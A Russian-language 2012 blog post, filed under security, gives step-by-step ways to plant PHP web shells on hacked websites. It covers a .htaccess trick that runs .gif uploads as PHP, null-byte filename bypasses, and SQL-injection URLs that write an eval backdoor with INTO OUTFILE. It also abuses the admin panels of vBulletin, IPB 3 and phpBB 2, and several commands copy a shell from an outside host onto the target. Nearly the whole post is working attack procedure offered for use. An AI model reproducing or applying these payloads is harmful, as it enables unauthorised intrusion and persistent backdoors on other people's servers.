Производство фотообоев в Новосибирске. Интернет магазин фотообоев. Изготовление - один день! Каталог 10 000 изображений!
13 Ноябрь 2012

Заливаем шелл на разные CMS

За особой важностью информации полностью содрано отсюда Способы заливки шелла

Льем шелл через картинку

Вы взломали сайт (разумеется только тестируете) с самописной админкой… И не можете залит веб-шелл, но там присутствует заливка картинок и загружает только форматы .jpg, .gif, .png.
Что в этом случаем можно сделать?

Пихаем шелл с расширением .gif в какую нибудь папку с картинками, и создаем файл .htaccess с содержимым

AddType application/x-httpd-php .gif
Данная команда выполнит формат .gif как php
Пробуем открыть [path]/shell.gif

Так же, если скрипт не равнодушен к переносу строки, пробуем залить шелл попутно переименовав его в shell.php%00.jpg, проверять доступность shell.php, а вдруг?

Способ заливки шелла через mysql.user из скули

1)Узнаем из под кого мы сидим и узнаем так же его права к mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Узнаем под кем мы сидим)
2)site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user='наш юзер'+--+
(Проверим привилегии нашего юзера. Если выдаёт ошибку при выводе, можно похексить нашего юзера 0x)
3)site.com/index.php?id=-1+union+select+1,'< ?php eval($_REQUEST[cmd]); ?>',3+from+mysql.user+into+outfile+'Путь до файла'+--+
(Заливаем мини-шелл)
P.S
Что бы всё получилось нужно имееть права на запись и знать полный путь до корня.
Так же проверить права на запись можно так:

site.com/index.php?id=1+and+1=0+union+Select+1,'prava',3+from+mysql.user+--+
Если prava отобразится, то права есть.

Следующая ситуация. Мы в админке форумного движка vBulletin

Заходим:
Plugins & Products -> Plugin Manager -> [Add New Plugin]
Плагины & Продукты -> Менеджер плагинов -> [Добавить новый плагин]

Выбираем темптлей. Обычно выбирают faq_complete, выбираем и жмем галочку Plugin is Active выставляем «Yes» и сохраняем.

Далее выводим phpinfo()

localhost/forum/faq.php?cmd=phpinfo();

Если мы вывели phpinfo() то считайте шелл у нас в руках.

Далее в phpinfo нужно найти полный путь до форума (например /home/u0000/site.ru/www/sell.php). Далее нам нужно наш веб-шелл превратить в txt файл и залить на любой сайт
mysite.com/shell.txt
Шелл заливаем командой

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что делает эта команда? Она копирует содержимое переменной [a] в переменную [b], то есть shell.txt копирует в shell.php

Заливаем шелл в IPB 3


Заходим:
Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

Код:
select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'
Полный путь можно посмотреть так:

Админка->Поддержка
Там будет сверху написана версия PHP и слева ссылка на PHPINFO

Шелл тут:
http://site.com/uploads/shell.php

Заливаем шелл в phpBB 2

1. Создаём файл ex.sql
2. Прописываем туда

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;
Где user_id=2 — идентификатор администратора

3. Заходим в админ-панель
4. В админ-панеле выбираем пункт «Восстановить БД» и загружаем ex.sql
5. Выполняем код / Заливаем шелл так

Заходим:
http://target/profile.php?mode=editprofile&e=phpinfo();
После:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что бы вывести phpinfo() нужно быть авторизованным.

Это только коротенький список, как и на какие движки можно залить шелл. Нужно больше? Welcome к ребятам на rdot
заливка на форумы
заливка на cms
А вот и мой любимый шелл, тоже на rdot))
WSO

рубрики: security | 4 комментария